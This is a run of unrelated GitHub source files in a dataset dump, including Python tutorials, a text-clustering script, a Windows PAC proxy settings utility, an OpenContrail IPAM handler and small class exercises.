tikzcommand\n","repo_name":"jochen-rath/Arbeitsblattgenerator","sub_path":"Funktionen/funktionenTikzDiagrammAufgabe.py","file_name":"funktionenTikzDiagrammAufgabe.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"de","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"34415422417","text":"# def describe_pet(animal_type='cat',pet_name):\n# 有问题,非默认值形参必须在默认值形参前面\nanimal = 'cat'\n#函数默认值只在定义函数时初始化一次,如果默认值是列表或字典,可以使用函数来修改\ndef describe_pet(pet_name,animal_type=animal):\n print(f\"I have a {animal_type}, it's name is {pet_name.title()}.\")\n animal = 'dog'\nanimal = 'dog'\n\ndescribe_pet('kiko')\ndescribe_pet(pet_name='kiko')\n#animal_type='cat'是默认值,如果调用函数时给animal_type提供了实参,python将忽略这个形参的默认值\ndescribe_pet('dabai','dog')","repo_name":"RzMY/Study","sub_path":"Python/8.2.3.py","file_name":"8.2.3.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35907955460","text":"# you should download from http://mlcomp.org/datasets/379, and move the data under data-clustering\n\nimport sklearn.datasets\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport nltk.stem\nfrom sklearn.cluster import KMeans\nimport scipy as sp\n\nMLCOMP_DIR = \"./data-clustering\"\n\nnew_post = \\\n \"\"\"Disk drive problems. Hi, I have a problem with my hard disk.\nAfter 1 year it is working only sporadically now.\nI tried to format it, but now it doesn't boot any more.\nAny ideas? Thanks.\n\"\"\"\n\ngroups = ['comp.graphics', 'comp.os.ms-windows.misc', 'comp.sys.ibm.pc.hardware', 'comp.sys.mac.hardware', 'comp.windows.x','sci.space']\ntrain_data = sklearn.datasets.load_mlcomp(\"20news-18828\", \"train\", mlcomp_root=MLCOMP_DIR, categories=groups)\nprint(train_data.target_names)\nprint(len(train_data.filenames))\n\nenglish_stemmer = nltk.stem.SnowballStemmer('english')\n\nclass StemmedTfidfVectorizer(TfidfVectorizer):\n\n def build_analyzer(self):\n analyzer = super(TfidfVectorizer,self).build_analyzer()\n return lambda doc: (\n english_stemmer.stem(w) for w in analyzer(doc)\n )\n\n\nvectorizer = StemmedTfidfVectorizer(min_df=10, max_df=0.5, stop_words='english', decode_error='ignore')\nvectorized = vectorizer.fit_transform(train_data.data)\n\nnum_clusters = 50\nkm = KMeans(n_clusters=num_clusters,init='random',n_init=1,verbose=1)\nkm.fit(vectorized)\n\nprint(km.labels_)\nprint(km.labels_.shape)\n\nnew_post_vec = vectorizer.transform([new_post])\nnew_post_label = km.predict(new_post_vec)[0]\nprint(new_post_label)\n\nsimiliar_indices = (km.labels_ == new_post_label).nonzero()[0]\n\nsimilar = []\nfor i in similiar_indices:\n dist = sp.linalg.norm((new_post_vec - vectorized[i]).toarray())\n similar.append((dist, train_data.data[i]))\nsimilar = sorted(similar)\n\nprint(similar[0])\nprint(similar[int(len(similar)/2)])\nprint(similar[-1])\n\n","repo_name":"aha-oretama/BuildingMachineLearningSystemsWithPython","sub_path":"ch3/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22991377015","text":"# Python 有以下内置数据类型\n# 字符串类型:str\n# 数值类型:int,float,complex\n# 序列类型: list,tuple,range\n# 映射类型:dict\n# 集合类型:set,frozenset\n# 布尔类型:bool\n# 二进制类型:bytes,bytearray,memoryview\n\n# 可以使用 type() 函数获取数据类型\n\n# 当为变量赋值时,会设置相应的数据类型\nv1 = \"Python\"\nprint(type(v1)) # \n\nv2 = 2023\nprint(type(v2)) # \n\nv3 = 3.14\nprint(type(v3)) # \n\nv4 = 1 + 
2j\nprint(type(v4)) # \n\nv5 = [\"apple\", \"banana\", \"coconut\"]\nprint(type(v5)) # \n\nv6 = (\"durian\", \"grape\", \"orange\")\nprint(type(v6)) # \n\nv7 = range(10)\nprint(type(v7)) # \n\nv8 = {\"name\": \"Felix\", \"age\": 22}\nprint(type(v8)) # \n\nv9 = {\"apple\", \"banana\", \"cherry\"}\nprint(type(v9)) # \n\nv10 = frozenset({\"apple\", \"banana\", \"cherry\"})\nprint(type(v10)) # \n\nv11 = True\nprint(type(v11)) # \n\nv12 = b\"Hello\"\nprint(type(v12)) # \n\nv13 = bytearray(10)\nprint(type(v13)) # \n\nv14 = memoryview(bytes(10))\nprint(type(v14)) # \n\n# 使用构造函数指定数据类型\nx1 = str(\"Python\")\nx2 = int(2023)\nx3 = float(3.14)\nx4 = complex(1 + 2j)\nx5 = list([\"apple\", \"banana\", \"cherry\"])\nx6 = tuple((\"apple\", \"banana\", \"cherry\"))\nx7 = range(10)\nx8 = dict(name=\"Felix\", age=22)\nx9 = set((\"apple\", \"banana\", \"cherry\"))\nx10 = frozenset((\"apple\", \"banana\", \"cherry\"))\nx11 = bool(5)\nx12 = bytes(1)\nx13 = bytearray(1)\nx14 = memoryview(bytes(1))\n\n","repo_name":"coder-felixovo/python-tour","sub_path":"01-basics/02-数据类型.py","file_name":"02-数据类型.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31198596610","text":"import numpy as np\nimport os\nfrom PIL import Image\n\ndef return_class():\n train_path = \"stage2/train_source/\"\n train = os.listdir(train_path)\n class_names = [i[:-4] for i in train]\n return class_names\n\n\ndef load_picture():\n train_path = \"stage2/train_source/\"\n test_path = \"stage2/test_source/\"\n train = os.listdir(train_path)\n train_imgs = []\n valid_imgs = []\n \n t = (0,0,675,375)\n\n # mg = Image.open(train_path+train[0])\n # p = make_position()\n # i1 = mg.crop(p[0])\n # print(mg.size)\n # print(i1.size)\n # print(mg.crop(t).size)\n # print(p[0])\n\n for i in train:\n train_imgs += [Image.open(train_path+i).resize((750,750)).convert('RGB') ]\n # valid_imgs += [Image.open(test_path+i).crop(t).resize((224,224)).convert('RGB') ]\n valid_imgs += [Image.open(test_path+i).resize((224,224)).convert('RGB') ]\n classes = list(range(len(train_imgs)))\n return train_imgs, valid_imgs\n\ndef make_lot_pic(img):\n x,y = img.size\n # position = [ (0,0,x//2,y//2), (x//2,0,x,y//2), (0,y//2,x//2,y), (x//2,y//2,x,y) ]\n position = make_position()\n cropped_img = []\n for i in position:\n t = img.crop(i).resize((224,224))\n cropped_img += [t]\n return cropped_img\n\ndef make_position():\n position = []\n x1 = 750-224\n y1 = 750-224\n for i in range(0,x1,50):\n for j in range(0,y1,50):\n position.append([i,j,i+224,j+224])\n\n x1 = 750 - 500\n y1 = 750 - 500\n for i in range(0,x1,60):\n for j in range(0,y1,60):\n position.append([i,j,i+500,j+500])\n\n x1 = 750 - 600\n y1 = 750 - 600\n for i in range(0,x1,40):\n for j in range(0,y1,40):\n position.append([i,j,i+600,j+600])\n return position\n\ndef make_data():\n classes = return_class()\n train,valid = load_picture()\n x_train = []\n y_train = []\n for i,j in enumerate(train):\n t = make_lot_pic(j)\n x_train += t\n y_train += [i for _ in range(len(t))]\n t = 0\n save_path = \"stage2/train/\"\n for img,label in zip(x_train, y_train):\n img.save(save_path+classes[label]+\"/\"+str(t)+\".jpg\")\n t += 1\n # print(img.size)\n # print(label)\n # print(classes[label])\n return x_train, y_train, valid, list(range(len(valid)))\n\ndef make_test_data():\n classes = return_class()\n train,valid = load_picture()\n\n t = 0\n save_path = \"stage2/test/\"\n for img,label in zip(valid, classes):\n 
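# make_position() above enumerates fixed-size crop windows over a 750x750
# image at a given stride; the same sliding-window pattern, generalized
# (window and stride values below are illustrative):
def window_boxes(image_size, window, stride):
    boxes = []
    for x in range(0, image_size - window, stride):
        for y in range(0, image_size - window, stride):
            boxes.append((x, y, x + window, y + window))
    return boxes

print(len(window_boxes(750, 224, 50)))  # 121 windows: an 11 x 11 grid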
img.save(save_path+label+\"/\"+str(t)+\".jpg\")\n t += 1\n\ndef make_folders():\n train_path = \"stage2/train_source/\"\n file_list = os.listdir(train_path)\n for i in file_list:\n os.mkdir(\"stage2/train/\"+i[:-4])\n os.mkdir(\"stage2/test/\"+i[:-4])\n\n\n\ndef main():\n make_folders()\n make_data()\n make_test_data()\n\n\nif __name__==\"__main__\":\n # a = make_position\n # print(a())\n main()\n","repo_name":"daikiclimate/sumaAI","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14913699916","text":"from sys import argv\nimport MeCab\nimport markovify\nimport time\n\ndef main():\n with open(\"chimi.txt\",encoding='utf-8') as file:\n text = file.read()\n tagger = MeCab.Tagger(\"-O wakati\")\n #text = tagger.parse(text)\n #model = markovify.Text(text, state_size=1)\n data = [tagger.parse(s) for s in text.split(\"\\n\") if s != \"\"]\n joinedData = \"\".join(data)\n model = markovify.NewlineText(joinedData, state_size=2)\n for i in range(100):\n sentence = model.make_short_sentence(150)\n if sentence==None:\n exit()\n sentence=sentence.replace(\" \",\"\")\n print(sentence)\n time.sleep(0.5)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"inatoihs/chimigo","sub_path":"chimi.py","file_name":"chimi.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40104783178","text":"from vnc_api import exceptions as vnc_exc\nfrom vnc_api import vnc_api\n\nfrom neutron_plugin_contrail.plugins.opencontrail.vnc_client.contrail_res_handler import (\n ResourceCreateHandler,\n ResourceDeleteHandler,\n ResourceGetHandler,\n ResourceUpdateHandler,\n)\n\n\nclass IPamMixin(object):\n def _ipam_vnc_to_neutron(self, ipam_obj):\n ipam_q_dict = self._vnc_lib.obj_to_dict(ipam_obj)\n\n # replace field names\n ipam_q_dict['id'] = ipam_q_dict.pop('uuid')\n ipam_q_dict['name'] = ipam_obj.name\n ipam_q_dict['tenant_id'] = self._project_id_vnc_to_neutron(\n ipam_obj.parent_uuid)\n ipam_q_dict['project_id'] = ipam_q_dict['tenant_id']\n ipam_q_dict['mgmt'] = ipam_q_dict.pop('network_ipam_mgmt', None)\n net_back_refs = ipam_obj.get_virtual_network_back_refs()\n if net_back_refs:\n ipam_q_dict['nets_using'] = []\n for net_back_ref in net_back_refs:\n net_fq_name = net_back_ref['to']\n ipam_q_dict['nets_using'].append(net_fq_name)\n\n return ipam_q_dict\n # end _ipam_vnc_to_neutron\n\n def _ipam_neutron_to_vnc(self, ipam_q, ipam_obj):\n if 'mgmt' in ipam_q and ipam_q['mgmt']:\n ipam_obj.set_network_ipam_mgmt(\n vnc_api.IpamType.factory(**ipam_q['mgmt']))\n\n return ipam_obj\n # end _ipam_neutron_to_vnc\n\n\nclass IPamBaseGet(ResourceGetHandler):\n resource_get_method = \"network_ipam_read\"\n\n\nclass IPamGetHandler(IPamBaseGet, IPamMixin):\n resource_list_method = \"network_ipams_list\"\n detail = False\n\n def resource_get(self, context, ipam_id, fields=None):\n try:\n ipam_obj = self._resource_get(id=ipam_id)\n except vnc_exc.NoIdError:\n # TODO() add ipam specific exception\n self._raise_contrail_exception('NetworkNotFound', net_id=ipam_id,\n resource='ipam')\n\n return self._ipam_vnc_to_neutron(ipam_obj)\n\n def resource_list_by_project(self, project_id):\n project_uuid = self._project_id_neutron_to_vnc(project_id)\n\n resp_dict = self._resource_list(parent_id=project_uuid)\n return resp_dict['network-ipams']\n\n def resource_list(self, context=None, filters=None, 
fields=None):\n ret_list = []\n\n # collect phase\n all_ipams = [] # all ipams in all projects\n if filters and 'tenant_id' in filters:\n project_ids = self._validate_project_ids(\n context, filters['tenant_id'])\n for p_id in project_ids:\n project_ipams = self.resource_list_by_project(p_id)\n all_ipams.append(project_ipams)\n else: # no filters\n dom_projects = self._project_list_domain(None)\n for project in dom_projects:\n proj_id = project['uuid']\n project_ipams = self.resource_list_by_project(proj_id)\n all_ipams.append(project_ipams)\n\n # prune phase\n for project_ipams in all_ipams:\n for proj_ipam in project_ipams:\n # TODO() implement same for name specified in filter\n proj_ipam_id = proj_ipam['uuid']\n if not self._filters_is_present(filters, 'id', proj_ipam_id):\n continue\n ipam_info = self.resource_get(context, proj_ipam['uuid'])\n ret_list.append(ipam_info)\n\n return ret_list\n\n def resource_count(self, filters=None):\n count = self._resource_count_optimized(filters)\n if count is not None:\n return count\n\n ipam_info = self.resource_list(filters=filters)\n return len(ipam_info)\n\n\nclass IPamUpdateHandler(ResourceUpdateHandler, IPamBaseGet, IPamMixin):\n resource_update_method = \"network_ipam_update\"\n\n def resource_update(self, context, ipam_id, ipam_q):\n try:\n ipam_obj = self._ipam_neutron_to_vnc(\n ipam_q, self._resource_get(id=ipam_id))\n except vnc_exc.NoIdError:\n raise self._raise_contrail_exception(\n 'IpamNotFound', ipam_id=ipam_id, resource='ipam')\n self._resource_update(ipam_obj)\n\n return self._ipam_vnc_to_neutron(ipam_obj)\n\n\nclass IPamDeleteHandler(ResourceDeleteHandler):\n resource_delete_method = \"network_ipam_delete\"\n\n def resource_delete(self, context, ipam_id):\n return self._resource_delete(id=ipam_id)\n\n\nclass IPamCreateHandler(ResourceCreateHandler):\n resource_create_method = \"network_ipam_create\"\n\n def resource_create(self, context, ipam_q):\n ipam_name = ipam_q.get('name', None)\n project_id = self._project_id_neutron_to_vnc(ipam_q['tenant_id'])\n try:\n project_obj = self._project_read(proj_id=project_id)\n except vnc_exc.NoIdError:\n raise self._raise_contrail_exception(\n \"ProjectNotFound\", project_id=project_id, resource='ipam')\n\n ipam_obj = self._ipam_neutron_to_vnc(\n ipam_q, vnc_api.NetworkIpam(ipam_name, project_obj))\n try:\n self._resource_create(ipam_obj)\n except vnc_exc.RefsExistError as e:\n self._raise_contrail_exception(\n 'BadRequest',\n resource='ipam', msg=str(e))\n return self._ipam_vnc_to_neutron(ipam_obj)\n\n\nclass IPamHandler(IPamCreateHandler,\n IPamUpdateHandler,\n IPamDeleteHandler,\n IPamGetHandler):\n pass\n","repo_name":"tungstenfabric/tf-neutron-plugin","sub_path":"neutron_plugin_contrail/plugins/opencontrail/vnc_client/ipam_res_handler.py","file_name":"ipam_res_handler.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74384721386","text":"import ctypes\r\nfrom ctypes import windll, wintypes\r\n\r\n\r\nINTERNET_PER_CONN_FLAGS = 1\r\nINTERNET_PER_CONN_AUTOCONFIG_URL = 4\r\nINTERNET_OPTION_REFRESH = 37\r\nINTERNET_OPTION_SETTINGS_CHANGED = 39\r\nINTERNET_OPTION_PER_CONNECTION_OPTION = 75\r\n\r\nPROXY_TYPE_AUTO_PROXY_URL = 4\r\n\r\nInternetSetOption = windll.wininet.InternetSetOptionW\r\nInternetQueryOption = windll.wininet.InternetQueryOptionW\r\nGlobalFree = windll.Kernel32.GlobalFree\r\n\r\n\r\nclass INTERNET_PER_CONN_OPTION(ctypes.Structure):\r\n class Value(ctypes.Union):\r\n 
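# resource_list() above gathers every project's ipams first and prunes them
# against the requested filters afterwards. The pruning step in isolation,
# with plain dicts standing in for the VNC API objects:
def prune(items, wanted_ids=None):
    return [i for i in items if wanted_ids is None or i["uuid"] in wanted_ids]

ipams = [{"uuid": "a"}, {"uuid": "b"}, {"uuid": "c"}]
print(prune(ipams, wanted_ids={"a", "c"}))  # [{'uuid': 'a'}, {'uuid': 'c'}]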
_fields_ = [\r\n ('dwValue', wintypes.DWORD),\r\n ('pszValue', wintypes.LPWSTR),\r\n ('ftValue', wintypes.FILETIME),\r\n ]\r\n\r\n def set(self, val):\r\n if type(val) == wintypes.DWORD:\r\n self.dwValue = val\r\n elif type(val) == wintypes.LPWSTR:\r\n self.pszValue = val\r\n else:\r\n self.dwValue = 0\r\n\r\n _fields_ = [\r\n ('dwOption', wintypes.DWORD),\r\n ('Value', Value),\r\n ]\r\n\r\n\r\nclass INTERNET_PER_CONN_OPTION_LIST(ctypes.Structure):\r\n _fields_ = [\r\n ('dwSize', wintypes.DWORD),\r\n ('pszConnection', wintypes.LPWSTR),\r\n ('dwOptionCount', wintypes.DWORD),\r\n ('dwOptionError', wintypes.DWORD),\r\n ('pOptions', ctypes.POINTER(INTERNET_PER_CONN_OPTION)),\r\n ]\r\n\r\n @staticmethod\r\n def make(opt_items):\r\n item_num = len(opt_items)\r\n List = INTERNET_PER_CONN_OPTION_LIST()\r\n Option = (INTERNET_PER_CONN_OPTION * item_num)()\r\n nSize = wintypes.DWORD(ctypes.sizeof(INTERNET_PER_CONN_OPTION_LIST))\r\n\r\n index = 0\r\n for k, v in opt_items:\r\n Option[index].dwOption = k\r\n Option[index].Value.set(v)\r\n index += 1\r\n\r\n List.dwSize = ctypes.sizeof(INTERNET_PER_CONN_OPTION_LIST)\r\n List.pszConnection = None\r\n List.dwOptionCount = item_num\r\n List.dwOptionError = 0\r\n List.pOptions = Option\r\n return List, nSize\r\n\r\n\r\ndef get_pac_setting_impl():\r\n opt_list, size_ = INTERNET_PER_CONN_OPTION_LIST.make([\r\n (INTERNET_PER_CONN_AUTOCONFIG_URL, None),\r\n (INTERNET_PER_CONN_FLAGS, None)\r\n ])\r\n\r\n is_ok = InternetQueryOption(None, INTERNET_OPTION_PER_CONNECTION_OPTION,\r\n ctypes.byref(opt_list), ctypes.byref(size_))\r\n opt = opt_list.pOptions\r\n v0 = opt[0].Value\r\n\r\n if v0.dwValue:\r\n url = ctypes.wstring_at(v0.pszValue)\r\n GlobalFree(v0.dwValue)\r\n else:\r\n url = ''\r\n\r\n flags = opt[1].Value.dwValue\r\n return bool(is_ok), url, flags\r\n\r\n\r\ndef set_pac_setting_impl(url, flags=None):\r\n if url is None and flags is None:\r\n return False\r\n\r\n settings = []\r\n if url is not None:\r\n url_buf = ctypes.create_unicode_buffer(url)\r\n url_ = ctypes.cast(url_buf, wintypes.LPWSTR)\r\n url_item = (INTERNET_PER_CONN_AUTOCONFIG_URL, url_)\r\n settings.append(url_item)\r\n\r\n if flags is not None:\r\n flag_item = (INTERNET_PER_CONN_FLAGS, wintypes.DWORD(flags))\r\n settings.append(flag_item)\r\n\r\n opt_list, size_ = INTERNET_PER_CONN_OPTION_LIST.make(settings)\r\n is_ok = InternetSetOption(None, INTERNET_OPTION_PER_CONNECTION_OPTION,\r\n ctypes.byref(opt_list), size_)\r\n if not is_ok:\r\n return False\r\n\r\n InternetSetOption(None, INTERNET_OPTION_SETTINGS_CHANGED, None, 0)\r\n InternetSetOption(None, INTERNET_OPTION_REFRESH, None, 0)\r\n return True\r\n\r\n\r\ndef get_pac_setting():\r\n is_ok, url, flags = get_pac_setting_impl()\r\n if not is_ok:\r\n return False, None, None\r\n\r\n is_enabled = flags & PROXY_TYPE_AUTO_PROXY_URL\r\n return is_ok, url, bool(is_enabled)\r\n\r\n\r\ndef set_pac_setting(pac_file=None, enabled=None):\r\n if pac_file is None and enabled is None:\r\n return False\r\n\r\n if enabled is None:\r\n return set_pac_setting_impl(pac_file)\r\n\r\n is_ok, url, flags = get_pac_setting_impl()\r\n if not is_ok:\r\n return False\r\n\r\n if enabled:\r\n flags |= PROXY_TYPE_AUTO_PROXY_URL\r\n else:\r\n flags &= ~PROXY_TYPE_AUTO_PROXY_URL\r\n\r\n return set_pac_setting_impl(pac_file, flags)\r\n\r\n\r\ndef test():\r\n def show_setting():\r\n is_ok, url, enabled = get_pac_setting()\r\n assert is_ok\r\n print(url, enabled)\r\n return enabled\r\n\r\n show_setting()\r\n\r\n from time import time\r\n 
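# set_pac_setting() above toggles a single bit inside the connection-flags
# word. The bitmask idiom on its own (constant value as defined above):
PROXY_TYPE_AUTO_PROXY_URL = 4

flags = 0b0001
flags |= PROXY_TYPE_AUTO_PROXY_URL    # enable: set the bit    -> 0b0101
flags &= ~PROXY_TYPE_AUTO_PROXY_URL   # disable: clear the bit -> 0b0001
print(bin(flags))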
set_pac_setting(pac_file=f'http://proxy.pac/?t={time()}')\r\n enabled = show_setting()\r\n\r\n set_pac_setting(pac_file=None, enabled=not enabled)\r\n show_setting()\r\n\r\n\r\nif __name__ == '__main__':\r\n test()\r\n","repo_name":"1ocalhost/creeper","sub_path":"src/creeper/impl/win_pac_setting.py","file_name":"win_pac_setting.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7807031958","text":"import argparse\r\nimport json\r\nfrom random import randint\r\nimport re\r\nfrom pprint import pprint\r\nfrom functools import reduce\r\n\r\ndef parse_command_line():\r\n \"\"\"\r\n Set up command line arguments.\r\n Args:\r\n None.\r\n Returns:\r\n Argparse object for setting up command line arguments.\r\n \"\"\"\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('-i', '--input', dest=\"input_file\", help=\"path to json output of data_usa_parse.py\", metavar=\"PATH\", required=True)\r\n parser.add_argument('-o', '--output', dest=\"output_file\", help=\"output file, or stdout if omitted\", metavar=\"FILE\", required=False)\r\n parser.add_argument('-s', '--story-type', dest=\"story_type\", help=\"story type to create, 0-66 inclusive\", metavar=\"STORY\", required=False)\r\n parser.add_argument('-m', '--mayor', dest=\"mayor\", help=\"Mayor's name.\", metavar=\"NAME\", required=False)\r\n parser.add_argument('-c', '--city', dest=\"city\", help=\"city's name\", metavar=\"CITY\", required=False)\r\n parser.add_argument('-t', '--team', dest=\"team\", help=\"name of a sports team\", metavar=\"TEAM\", required=False)\r\n args = parser.parse_args()\r\n return args\r\n\r\n\r\n\r\ndef generate_story(raw_tokens, story_type, mayor, city, team, fed_rate):\r\n if 0 > story_type > 66:\r\n raise AssertionError(\"Story type must be between 0 and 82 inclusive.\")\r\n idx = list(raw_tokens.keys())[story_type]\r\n story_group = raw_tokens[idx]\r\n base_story = story_group[randint(0, len(story_group) - 1)]\r\n raw_tokens[\"mayorname\"] = mayor\r\n raw_tokens[\"cityname\"] = city\r\n raw_tokens[\"teamname\"] = team\r\n\r\n try:\r\n headline_text, body = base_story.split('+', 1)\r\n except ValueError as e:\r\n print(\"+?\", \"+\" in base_story, \"len\", len(base_story.split('+')), \"cnt\", base_story.count('+'))\r\n print(base_story)\r\n raise ValueError(e)\r\n # if \"dateline\" in base_story:\r\n\r\n\r\n filled_headline = tokens_fill(headline_text, raw_tokens, headline=True)\r\n filled_story = tokens_fill(body, raw_tokens, {}, headline=False)\r\n # print(\"filled:\", [filled_story])\r\n\r\n final_body = format_story(filled_story, fed_rate)\r\n final_headline = format_headline(filled_headline, fed_rate)\r\n\r\n final_story = final_headline + final_body\r\n return final_story\r\n\r\ndef format_headline(headline, fed_rate):\r\n headline = headline.title() + ' -'\r\n headline = number_replace(headline, fed_rate)\r\n return headline\r\n\r\ndef format_story(story, fed_rate):\r\n # Because re.sub() escapes the single quotes.\r\n no_escape = story.replace(\"\\\\'\", \"'\")\r\n\r\n # find dashes that are between two words. We don't want to change those to paragraph breaks.\r\n if \"MisSim\" not in story:\r\n no_escape = no_escape.replace(\"--\", \"zqzdbldashzqz\")\r\n else:\r\n no_escape = no_escape.replace(\"--\", \"\\n\\t\\n\\t\")\r\n inline_dashes = [x.start() + 1 for x in re.finditer(r\"\\w(? 
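# The re.finditer() call above (its pattern is truncated in this dump) looks
# for dashes flanked by word characters, so that "--" between spaces can be
# treated as a paragraph break instead. One plausible reconstruction, offered
# only as an illustration:
import re

text = "well-known idea -- with an aside--here"
inline = [m.start() + 1 for m in re.finditer(r"\w(?=-\w)", text)]
print(inline)  # [4]: only the dash inside "well-known" joins two words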
None:\n self.queue = queue\n\n def consume(self, recognition_result: RecognitionResult) -> None:\n self.queue.put(recognition_result)\n\nclass RecognitionPipeline(FrameConsumer):\n def __init__(\n self,\n jobdatabase: PrintjobRepository,\n result_consumer: Union[RecognitionResultConsumer, queue.Queue],\n feature_extractor: FeatureExtractor,\n preprocessing: ImagePreprocessing,\n ) -> None:\n self.jobdatabase = jobdatabase\n self.feature_extractor = feature_extractor\n self.preprocessing = preprocessing\n\n\n if isinstance(result_consumer, queue.Queue):\n self.resultConsumer = QueueRecognitionResultConsumer(result_consumer)\n else:\n self.resultConsumer = result_consumer\n\n def consume(self, frame: np.ndarray, capturing_context: CapturingContext):\n\n preprocessed_frame = self.preprocessing.preprocess(frame)\n\n features = self.feature_extractor.extract_features(preprocessed_frame)\n\n all_jobs_features = self.jobdatabase.get_all_printjob_features()\n\n job_id, distance = similarity.find_best_match(features, all_jobs_features)\n\n job = self.jobdatabase.get(job_id)\n\n recognition_result = RecognitionResult(\n job=job,\n captured_image=frame,\n capturing_context=capturing_context,\n preprocessed_image=preprocessed_frame,\n calculated_distance=distance,\n )\n self.resultConsumer.consume(recognition_result)\n","repo_name":"maria0406/Vision.Link","sub_path":"VisionLink-main/ors/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26088513896","text":"# Assignment Basketball Dictionaries\n\n\"\"\"\nChallenge 1: Update the Constructor\nUpdate the constructor to accept a dictionary with a single player's \ninfo instead of individual arguments for attributes\n\"\"\"\n\nclass Player:\n \"\"\"Create a model of a player\"\"\"\n\n def __init__(self, player):\n self.name = player['name']\n self.age = player['age']\n self.position = player['position']\n self.team = player['team']\n\n def __repr__(self):\n \"\"\"__repr__ is used to format class print to terminal\"\"\"\n display = f\"player: {self.name}, age: {self.age}, position: {self.position}, team: {self.team}\" \n return display\n\n \"\"\"\n Create a classmethod for taking a list of dictionaries and creating\n a list of instances\n \"\"\"\n @classmethod\n def add_player(cls, players_lst):\n \"\"\"Add player to all_players list for class\"\"\"\n all_players = []\n for player in players_lst:\n all_players.append(cls(player))\n return all_players\n\nthomas = {\n 'name': 'Thomas Muller', \n 'age': 32, \n 'position': 'Attacking midfielder', \n 'team': 'Bayern Munchen'\n}\n\njonas = {\n 'name': 'Jonas Hofmann',\n 'age': 29,\n 'position': 'Attacking midfielder',\n 'team': 'Borussia M\'Gladbach'\n}\n\nlukas = {\n 'name': 'Lukas Klostermann',\n 'age': 26,\n 'position': 'Center back',\n 'team': 'RB Leipzig'\n}\n\ntimo = {\n 'name': 'Timo Werner',\n 'age': 26,\n 'position': 'Striker',\n 'team': 'Chelsea'\n}\n\n\"\"\"\nChallenge 2: Create instances using individual player dictionaries\nNOTE: I had already created data before realizing I was supposed to \nuse the provided data. I just left it because it is the same basic\nthing... 
hopefully that is ok.\"\"\"\n\nplayer_thomas = Player(thomas)\nprint(player_thomas)\n\nplayer_jonas = Player(jonas)\nprint(player_jonas)\n\nplayer_lukas = Player(lukas)\nprint(player_lukas)\n\nplayer_timo = Player(timo)\nprint(player_timo)\nprint()\n\n\"\"\"\nChallenge 3: Make a list of Player instances for a list of dictionaries\nPopulate a new list with Player instances from the list of players\n\"\"\"\n\nplayers_lst = [\n {\n \"name\": \"Kevin Durant\", \n \"age\":34, \n \"position\": \"small forward\", \n \"team\": \"Brooklyn Nets\"\n },\n {\n \"name\": \"Jason Tatum\", \n \"age\":24, \n \"position\": \"small forward\", \n \"team\": \"Boston Celtics\"\n },\n {\n \"name\": \"Kyrie Irving\", \n \"age\":32, \n \"position\": \"Point Guard\", \n \"team\": \"Brooklyn Nets\"\n },\n {\n \"name\": \"Damian Lillard\", \n \"age\":33, \n \"position\": \"Point Guard\", \n \"team\": \"Portland Trailblazers\"\n },\n {\n \"name\": \"Joel Embiid\", \n \"age\":32, \n \"position\": \"Power Forward\", \n \"team\": \"Philadelphia 76ers\"\n },\n {\n \"name\": \"\", \n \"age\":16, \n \"position\": \"P\", \n \"team\": \"en\"\n }\n]\n\n\"\"\"\nSolution for challenge 3\nTake a list of dictionaries and produce a new list of instances\n\"\"\"\n\nnew_list = []\n\nfor item in range(len(players_lst)):\n temp_name = f\"player_{players_lst[item]['name']}\"\n temp_name = temp_name.lower()\n temp_name = temp_name.replace(' ', '_')\n\n temp_name = Player(players_lst[item])\n new_list.append(temp_name)\n # print(temp_name.name)\n\n# Print out instances in new_list\nfor item in new_list:\n print(item)\nprint()\n# NINJA BONUS: add a get_team(cls, team_list) and @classmethod\nall_players = Player.add_player(players_lst)\n\nfor player in all_players:\n print(player)\n","repo_name":"dreessen-n/coding-dojo_python","sub_path":"fundamentals/oop/basketball_dictionaries.py","file_name":"basketball_dictionaries.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16523081096","text":"#Enxhi Merkaj 20/10/2023\n#Team Assignment\n\n#This program will prompt the user to choose from 9 options until the user chooses option 0.\n\n#Create a list of 10 different options\nlists = [\n {\"value\": 1, \"description\": \"Watch a movie!\"},\n {\"value\": 2, \"description\": \"Go to sleep.\"},\n {\"value\": 3, \"description\": \"You should study.\"},\n {\"value\": 4, \"description\": \"Go learn Python.\"},\n {\"value\": 5, \"description\": \"Go out!\"},\n {\"value\": 6, \"description\": \"Maybe cook something.\"},\n {\"value\": 7, \"description\": \"Choose another number.\"},\n {\"value\": 8, \"description\": \"Call your friend.\"},\n {\"value\": 9, \"description\": \"Learn Java\"},\n {\"value\": 0, \"description\": \"Exit the program\"},\n]\n\n#Create a loop that will run until the user chooses 0\nwhile True:\n\n # Get user input\n user_input = input(\"Select a choice from 1 - 9: \")\n#Convert the input to an integer\n try:\n choice = int(user_input)\n\n#Execute if-else statement\n if choice in [option['value'] for option in lists]:\n if choice == 0:\n print(\"Exiting the program.\")\n break\n else:\n print(f\"You selected {choice}: {lists[choice-1]['description']}\")\n else:\n print(\"Invalid choice. Please select a valid option.\")\n except ValueError:\n 